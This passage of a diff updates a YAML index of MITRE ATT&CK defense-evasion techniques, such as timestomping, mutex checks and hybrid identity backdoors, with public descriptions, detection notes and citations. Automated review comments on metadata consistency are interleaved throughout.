Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Romain Dumont, ESET
+ - Mike Hartley @mikehartley10
+ x_mitre_deprecated: false
x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
It may be possible to detect timestomping using file modification monitoring
that collects information on file handle opens and can compare timestamp values.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Process: OS API Execution'
- 'File: File Modification'
- 'File: File Metadata'
+ - 'Command: Command Execution'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_permissions_required:
- - root
- - SYSTEM
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+ created: '2020-01-31T12:42:44.103Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/006
+ external_id: T1070.006
+ - source_name: WindowsIR Anti-Forensic Techniques
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ - source_name: Inversecos Timestomping 2022
+ description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+ Detection – NTFS Forensics. Retrieved September 30, 2024.'
+ url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+ - source_name: Magnet Forensics
+ description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+ with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+ url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+ - source_name: Double Timestomping
+ description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+ ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+ url: https://x.com/matthewdunwoody/status/1519846657646604289
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1070.006
atomic_tests: []
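Review bot: `x_mitre_permissions_required` (root, SYSTEM, User) is removed from T1070.006 with no structured replacement, the same pattern as T1556.002; the expanded description now carries that information in prose (`$SI` can be modified at the user level via API calls, `$FN` typically requires the kernel or a move/rename), so consumers that filtered on the structured field should be checked. Two data quality points in the added citations: the 'Double Timestomping' description ends with a doubled full stop ('out there..'), and the new contributor 'Mike Hartley @mikehartley10' mixes a name and a social handle where sibling entries use 'Name, Org'. Both are presumably upstream values, but this is where they enter the repo. The added data sources 'Process: OS API Execution' and 'Command: Command Execution' are consistent with the unchanged detection text about file handle opens and timestamp comparison.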
T1620:
@@ -4134,9 +4219,76 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1620
atomic_tests: []
+ T1480.002:
+ technique:
+ modified: '2024-10-28T16:22:25.431Z'
+ name: Mutual Exclusion
+ description: |-
+ Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+ While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+ In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+ Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Manikantan Srinivasan, NEC Corporation India
+ - Pooja Natarajan, NEC Corporation India
+ - Nagahama Hiroki – NEC Corporation Japan
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: OS API Execution'
+ - 'File: File Creation'
+ type: attack-pattern
+ id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+ created: '2024-09-19T14:00:03.401Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1480/002
+ external_id: T1480.002
+ - source_name: Intezer RedXOR 2021
+ description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+ Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+ September 19, 2024.
+ url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+ - source_name: Sans Mutexes 2012
+ description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+ Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+ url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+ - source_name: ICS Mutexes 2015
+ description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+ to Evade Detection. Retrieved September 19, 2024.
+ url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+ - source_name: Microsoft Mutexes
+ description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+ 2024.
+ url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+ - source_name: Deep Instinct BPFDoor 2023
+ description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+ Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+ 19, 2024.
+ url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.011:
technique:
modified: '2023-11-06T20:14:51.609Z'
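Review bot: the new T1480.002 block closes with `atomic_tests: []` and no `identifier: T1480.002` line, whereas the sibling entries in this same hunk (T1620 at `identifier: T1620`, and T1070.006 just above) carry one; the file is already inconsistent on this (T1550 and T1556.007 further down also lack it), so please confirm whether the generator is meant to emit `identifier` for every technique or only some, and fix the generator rather than hand-editing. Two smaller points in the same hunk: the removal of `spec_version: '2.1'` here is the first of many identical removals across the file, so it should be called out in the commit message as a deliberate generator/bundle change rather than left for reviewers to infer; and the third contributor line uses an en dash (`Nagahama Hiroki – NEC Corporation Japan`) where the other two use a comma, which is upstream data and fine to keep but will look like a typo to anyone grepping contributors.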
@@ -4200,57 +4352,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -4265,6 +4370,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1218.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:35:43.077Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
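Review bot: the Deloitte Environment Awareness citation now points at a Google Drive URL ending in `/edit` (the removed entry earlier in this file used the bare `file/d/<id>` form); `/edit` is the editor view and can prompt for sign-in, so please check that it still resolves for an anonymous reader before accepting the new retrieval date of September 13, 2024. Otherwise the seven external references removed from T1497.003 in the earlier hunk all reappear here in a different order, with the same URLs and descriptions, so nothing was dropped in the reorder.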
@@ -4338,8 +4490,8 @@ defense-evasion:
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
- Retrieved April 11, 2018.
- url: https://twitter.com/ItsReallyNick/status/958789644165894146
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
- applocker bypass. Retrieved April 11, 2018.
- url: https://twitter.com/NickTyrer/status/958450014111633408
+ applocker bypass. Retrieved September 12, 2024.
+ url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.003
atomic_tests: []
T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.002
atomic_tests: []
T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T19:01:55.821Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
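Review bot: `modified` for T1218.002 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-03-11T19:01:55.821Z`; a regenerated index normally only moves this timestamp forward. The same backwards move appears further down for T1599.001, T1553.003, T1207 and T1553.006, and in every case the removed value has the `14:00:00.188Z` pattern of a bulk release stamp, so this looks like the generator now reading a different ATT&CK bundle rather than five techniques being edited. Worth confirming the bundle/version the generator is pointed at is the intended one before merging.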
@@ -4559,8 +4709,6 @@ defense-evasion:
- User
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.002
atomic_tests: []
T1599.001:
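Review bot: after this hunk T1218.002 has neither `spec_version` nor `x_mitre_attack_spec_version` (the `2.1.0` line is removed and nothing replaces it), while neighbouring entries keep an `x_mitre_attack_spec_version` of `3.1.0` or `3.2.0`; T1599.001 and T1207 lose the field the same way below. If anything downstream reads `x_mitre_attack_spec_version`, it will now be absent for exactly the techniques that were still on the 2.1.0 spec, so either the generator should normalize the field or the consumers should tolerate its absence; please state which is intended.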
@@ -4583,7 +4731,7 @@ defense-evasion:
url: https://tools.ietf.org/html/rfc1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T01:45:58.951Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
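Review bot: the platform list for T1550 drops `Office 365` and `Google Workspace` and adds `Identity Provider` and `Office Suite` (with the version bump to `1.4`); this is the upstream platform consolidation, but any per-platform index or filter keyed on the old names (`Office 365`, `Google Workspace`, `Azure AD`) will silently stop matching these techniques unless the generator maps the new names onto the old buckets. Please confirm that mapping exists, or that the old per-platform outputs are being retired, since the same rename is applied to T1556.007 and T1078.001 later in this diff.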
@@ -4702,18 +4849,17 @@ defense-evasion:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.004:
technique:
- modified: '2024-03-28T00:01:08.337Z'
+ modified: '2024-09-12T19:37:57.867Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.004
atomic_tests: []
T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T04:58:58.214Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.003
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
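Review bot: the prose rename from Azure AD to Entra ID is applied consistently within the description, while the citation keys (`Azure AD Hybrid Identity`, `Azure AD Connect for Read Teamers`, `AADInternals Azure AD On-Prem to Cloud`) are left as-is, which is correct because they are identifiers matched against `source_name` entries. Note that `Read Teamers` reads as a typo for "Red Teamers" but is the upstream `source_name` and must not be fixed here in isolation; if it is ever corrected upstream, the `(Citation: ...)` marker and the `source_name` entry have to change together.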
@@ -4905,9 +5049,9 @@ defense-evasion:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
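Review bot: key order is not normalized across entries, which turns pure reorders into content-sized diffs: here `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are placed between `kill_chain_phases` and `x_mitre_detection`, while in T1497.003 earlier in this diff the same two keys sit after `object_marking_refs`. Emitting keys in a fixed (sorted or schema) order from the generator would make hunks like this one show only the real changes (the platform rename and the `1.0` to `1.1` version bump).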
@@ -4970,9 +5115,6 @@ defense-evasion:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.015:
technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.012:
technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.012
atomic_tests: []
T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
source_name: ADDSecurity DCShadow Feb 2018
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:20:04.850Z'
name: Rogue Domain Controller
description: |-
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1207
atomic_tests: []
T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:03.480Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
